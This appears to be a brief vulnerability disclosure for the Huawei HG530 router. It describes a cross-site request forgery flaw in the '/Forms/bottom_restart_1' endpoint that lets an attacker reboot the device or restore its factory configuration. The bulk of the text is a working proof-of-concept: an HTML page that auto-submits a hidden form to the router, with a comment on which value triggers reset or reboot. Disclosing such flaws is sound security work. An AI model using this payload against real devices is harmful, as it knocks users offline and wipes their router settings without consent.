Share
Multiple CSRF reboot and restore Vulnerability  
  
===========================  
  
The Huawei HG530 suffers from multiple CSRF vulnerability allows local  
attackers to reboot the device or to restore to factory Configuration.  
  
==================  
  
The vulnerability is located in form POST data parameter in  
'Restart_factory' via path '/Forms/bottom_restart_1'  
  
====================  
  
Security issue PoC :  
  
<html>  
  
<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"  
id='test' >  
  
<input type="hidden" name="defaltRomFlag" value="0">  
  
<input type="hidden" name="defaultIpFactory" value="192.168.1.1">  
  
  
  
<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">  
  
  
  
  
  
</form>  
  
<script>  
  
document.getElementById('test').submit();  
  
</script>  
  
</html>  
  
//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot